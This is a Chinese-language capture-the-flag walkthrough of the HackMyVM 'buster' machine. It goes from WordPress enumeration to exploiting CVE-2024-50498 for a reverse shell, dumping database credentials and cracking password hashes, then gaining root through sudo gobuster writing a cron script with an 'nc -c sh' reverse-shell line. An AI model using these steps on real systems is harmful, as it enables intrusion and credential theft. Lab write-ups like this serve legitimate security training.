HackMyVM-buster靶机详解WP

信息收集

服务探测

❯ arp-scan -l
pcap_activate: eth0: You don't have permission to perform this capture on that device
(socket: Operation not permitted)
❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.146  08:00:27:2c:76:ab       (Unknown)
192.168.60.254  00:50:56:e0:55:bd       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.969 seconds (130.02 hosts/sec). 4 responded
❯ export ip=192.168.60.146
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.146:22
Open 192.168.60.146:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 16:00 CST
Initiating ARP Ping Scan at 16:00
Scanning 192.168.60.146 [1 port]
Completed ARP Ping Scan at 16:00, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:00
Completed Parallel DNS resolution of 1 host. at 16:00, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:00
Scanning 192.168.60.146 [2 ports]
Discovered open port 80/tcp on 192.168.60.146
Discovered open port 22/tcp on 192.168.60.146
Completed SYN Stealth Scan at 16:00, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.146
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-09 16:00:24 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:2C:76:AB (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80端口开放着wordpress，尝试利用wpscan扫一下

❯ wpscan --url http://$ip -e u,ap --api-token "换成自己的Api"
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.146/ [192.168.60.146]
[+] Started: Thu Jan  9 16:00:44 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.60.146/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.146/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.146/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.146/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.60.146/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://192.168.60.146/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[+] WordPress theme in use: the-canvas
 | Location: http://192.168.60.146/wp-content/themes/the-canvas/
 | Latest Version: 1.0.1 (up to date)
 | Last Updated: 2023-11-06T00:00:00.000Z
 | Readme: http://192.168.60.146/wp-content/themes/the-canvas/readme.txt
 | Style URL: http://192.168.60.146/wp-content/themes/the-canvas/style.css
 | Style Name: The Canvas
 | Description: Introducing The Canvas —a testament to simplicity and elegance. It has meticulously crafted a clean ...
 | Author: Rajuan
 | Author URI: https://profiles.wordpress.org/rajuanislam/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.0.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.60.146/wp-content/themes/the-canvas/style.css, Match: 'Version: 1.0.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.60.146/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Sitemap (Aggressive Detection)
 |   - http://192.168.60.146/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Thu Jan  9 16:00:49 2025
[+] Requests Done: 56
[+] Cached Requests: 8
[+] Data Sent: 14.268 KB
[+] Data Received: 425.201 KB
[+] Memory used: 271.984 MB
[+] Elapsed time: 00:00:05

好像并没有枚举到什么相关信息，只有两个用户

可以尝试利用wpscan主动扫描模式

WPScan主动扫描

不过这个是全部枚举所有插件，扫的比较慢，只能等

说白了就是有个WordPress的插件字典，在扫描

大概二十分钟就出来了

❯ wpscan --url http://$ip -e u,ap --plugins-detection aggressive --api-token "换成自己的Api"
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.146/ [192.168.60.146]
[+] Started: Thu Jan  9 16:01:35 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.60.146/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.146/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.146/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.146/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.60.146/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://192.168.60.146/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[+] WordPress theme in use: the-canvas
 | Location: http://192.168.60.146/wp-content/themes/the-canvas/
 | Latest Version: 1.0.1 (up to date)
 | Last Updated: 2023-11-06T00:00:00.000Z
 | Readme: http://192.168.60.146/wp-content/themes/the-canvas/readme.txt
 | Style URL: http://192.168.60.146/wp-content/themes/the-canvas/style.css
 | Style Name: The Canvas
 | Description: Introducing The Canvas —a testament to simplicity and elegance. It has meticulously crafted a clean ...
 | Author: Rajuan
 | Author URI: https://profiles.wordpress.org/rajuanislam/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.0.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.60.146/wp-content/themes/the-canvas/style.css, Match: 'Version: 1.0.1'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:22:32 <================================================================> (108461 / 108461) 100.00% Time: 00:22:32
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.60.146/wp-content/plugins/akismet/
 | Latest Version: 5.3.5 (up to date)
 | Last Updated: 2024-11-19T02:02:00.000Z
 | Readme: http://192.168.60.146/wp-content/plugins/akismet/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.146/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.60.146/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.60.146/wp-content/plugins/akismet/readme.txt

[+] feed
 | Location: http://192.168.60.146/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.146/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wp-query-console
 | Location: http://192.168.60.146/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.60.146/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.146/wp-content/plugins/wp-query-console/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
 |     References:
 |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.60.146/wp-content/plugins/wp-query-console/README.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.60.146/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Sitemap (Aggressive Detection)
 |   - http://192.168.60.146/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 20

[+] Finished: Thu Jan  9 16:24:18 2025
[+] Requests Done: 108507
[+] Cached Requests: 48
[+] Data Sent: 29.031 MB
[+] Data Received: 34.545 MB
[+] Memory used: 465.609 MB
[+] Elapsed time: 00:22:43

• vp 枚举易受攻击的插件
• ap 枚举所有插件
• p 枚举热门插件
• vt 枚举易受攻击的主题
• at 枚举所有主题
• t 枚举热门主题
• tt 枚举缩略图
• cb 枚举备份配置
• dbe 导出数据库
• u 枚举用户 ID，例如 u1-5
• m 枚举媒体文件 ID，例如 m1-5
• --plugins-detection 枚举模式

POC利用

我们在结果中可以看到有个插件是有RCE漏洞的

google搜一下CVE-2024-50498

发现有POC利用

Nxploited/CVE-2024-50498

RandomRobbieBF/CVE-2024-50498: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution

但你会发现第一个POC脚本没办法直接利用

看看脚本的利用方案手动复现一下能否输出我们想要的信息

查看phpinfo的信息，可以成功输出

我们可以看到第一个POC是利用了php里面的system来执行命令的

但为什么就是会报错返回400

❯ python3 CVE-2024-50498.py -u http://192.168.60.146 -ip 192.168.60.100 -P 4444
[+] The site is vulnerable! Plugin version is 1.0.
[-] Exploit failed. Status code: 400
Response:
{"status":"error","data":"null","message":"Query args invalid"}

仔细查看phpinfo的信息发现有很多函数被禁用了，其中就包括system

虽然我不太懂php，直接问一手GPT

尝试利用shell_exec()能否反弹Shell

本地先监听一下端口

❯ pwncat-cs -lp 4444
[17:10:18] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

发送POST包的时候就卡住了，说明执行成功了

用户提权

拿到Webshell了，再次进行信息收集

❯ pwncat-cs -lp 4444
[17:10:18] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[17:10:40] received connection from 192.168.60.146:52658                                                                                    bind.py:84
[17:10:41] 192.168.60.146:52658: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@listen:/var/www/html/wordpress$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

看一下wp-config，里面有敏感信息

(remote) www-data@listen:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'll104567' );

/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '2Ryf <:T/-4,9h?q%jDi(HKG_*1xH-nU+-//7[1H}zD@=q0ls8junY(~.MG@D[$S' );
define( 'SECURE_AUTH_KEY',  '}z]MVJ|P5~X1!+76?dT?s|@A,92D4/+phWkWb=;I+k{_y)7,A,<=5|&z<tE:`HET' );
define( 'LOGGED_IN_KEY',    'p4w9>FcR>{+u:M,M4rT}VIW.[Pg=UZjzp8n{-/&F;j!nC49f-^~$unsry+lHW w!' );
define( 'NONCE_KEY',        ';qi?~eGux58*l4NoDh@?<`^B6!HK{G:C85Hv8sC6<t,y}8veV4pvs#{ [[T?s123' );
define( 'AUTH_SALT',        'l2^yBli3l_G#J<T 2p}e#bS>j_=,!06$%qYd#I<p22c:z&`s?ic;7UxS$T6c{HXr' );
define( 'SECURE_AUTH_SALT', '<;95CFam*#)^qbL)a,KZXrqS$!]Ln^2yF2wg#Fa?9F<D)-,irw&nj/$pB)BR1u|O' );
define( 'LOGGED_IN_SALT',   'JaR6i0q<wZMJD-7HwE:7ZwtNxV$BJ%15=8~Bw(_jCL_`+<`^asIdv=$Yo81jE19K' );
define( 'NONCE_SALT',       'q!5K2-Q*^%Tf<lz)*o0&8/CCjU;8-jdLS4,*5vk/8,^j&]<S7+I&eO55C_CM6N@L' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
if ( file_exists(ABSPATH . 'update-url.php') ) {
    include_once(ABSPATH . 'update-url.php');
}

存在一个DB的账户

同时发现本地开放3306端口，mysql连上去看一下

(remote) www-data@listen:/var/www/html/wordpress$ ss -lnutp
Netid       State        Recv-Q       Send-Q             Local Address:Port             Peer Address:Port
udp         UNCONN       0            0                        0.0.0.0:68                    0.0.0.0:*
tcp         LISTEN       0            128                      0.0.0.0:80                    0.0.0.0:*           users:(("nginx",pid=407,fd=6))
tcp         LISTEN       0            128                      0.0.0.0:22                    0.0.0.0:*
tcp         LISTEN       0            80                     127.0.0.1:3306                  0.0.0.0:*
tcp         LISTEN       0            128                         [::]:80                       [::]:*           users:(("nginx",pid=407,fd=7))
tcp         LISTEN       0            128                         [::]:22                       [::]:*
(remote) www-data@listen:/var/www/html/wordpress$ mysql -ull104567 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 108612
Server version: 10.3.39-MariaDB-0+deb10u2 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.002 sec)
MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url              | user_registered     | user_activation_key                           | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
|  1 | ta0        | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0           | [email protected] | http://192.168.31.181 | 2025-01-08 03:10:43 |                                               |           0 | ta0          |
|  2 | welcome    | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome       | [email protected]  |                       | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. |           0 | welcome      |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.002 sec)

MariaDB [wordpress]>

密码爆破

发现存在两个账户的密码hash，尝试导出爆破一下

MariaDB [wordpress]> select user_pass from wp_users;
+------------------------------------+
| user_pass                          |
+------------------------------------+
| $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. |
| $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ |
+------------------------------------+
2 rows in set (0.001 sec)

MariaDB [wordpress]> EXIT
Bye

这个$P$是wordpress生成的hash，你可以在hashcat的wiki中找到示例

❯ echo -n '$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/' >hash
❯ hashcat -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt
$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/:104567

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/
Time.Started.....: Thu Jan  9 17:30:39 2025 (2 mins, 24 secs)
Time.Estimated...: Thu Jan  9 17:33:03 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     5116 H/s (6.04ms) @ Accel:128 Loops:512 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 740352/14344385 (5.16%)
Rejected.........: 0/740352 (0.00%)
Restore.Point....: 739840/14344385 (5.16%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7680-8192
Candidate.Engine.: Device Generator
Candidates.#1....: 106302 -> 10082002

Started: Thu Jan  9 17:30:17 2025
Stopped: Thu Jan  9 17:33:05 2025

拿到密码了104567

当然你也可以用john无脑爆破，无需关注hash，看个人喜好了

❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
104567           (?)
1g 0:00:00:11 DONE (2025-01-09 17:36) 0.08992g/s 66543p/s 66543c/s 66543C/s 11042550..103645
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

利用这个账户来登入ssh

❯ ssh [email protected]
The authenticity of host '192.168.60.146 (192.168.60.146)' can't be established.
ED25519 key fingerprint is SHA256:wjUcj6T6r6sq8a/m+aBJnDgmy0hOeMWF04F18Qfae3Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.146' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  7 08:25:40 2025 from 192.168.31.34
$ bash
welcome@listen:~$

后面的流程基本上就和Listen一样了

HackMyVM-Listen靶机详解WP | Pepster’Blog

不过还是做一遍吧

拿到user flag了

welcome@listen:~$ cat user.txt
29e0f786e8c90b3ce82e00de0ec7e7d3

Root提权

用户有sudo权限

welcome@listen:~$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster
welcome@listen:~$ sudo /usr/bin/gobuster -w /root/root.txt -u http://192.168.60.100:8000
2025/01/09 04:48:44 [!] 1 error occurred:
        * Wordlist (-w): File does not exist: /root/root.txt

然而并没有这么简单，你想拿到root flag就必须拿到root shell

文件名改过了

既然知道有个定时任务那我就不解释了

welcome@listen:~$ cd /tmp
welcome@listen:/tmp$ echo 'nc -c sh 192.168.60.100 4444'>exp
welcome@listen:/tmp$ chmod +x exp
welcome@listen:/tmp$ echo 'tmp/exp'>dir.txt
welcome@listen:/tmp$ sudo /usr/bin/gobuster -w dir.txt -u http://192.168.60.100:8000 -q -n -o /opt/.test.sh
/tmp/exp
-----------分隔--------------------------
❯ mkdir -p tmp/exp
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
❯ pwncat-cs -lp 4444
[17:54:36] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[17:55:01] received connection from 192.168.60.146:50450                                                                                    bind.py:84
[17:55:01] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[17:55:02] 192.168.60.146:50450: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) root@listen:/root# ls
note.txt  R00t_fl4g_is_HHHHerererererrererere.txt
(remote) root@listen:/root# cat R00t_fl4g_is_HHHHerererererrererere.txt
b6a1a0de4223ba038327fc9c647701fb

🥳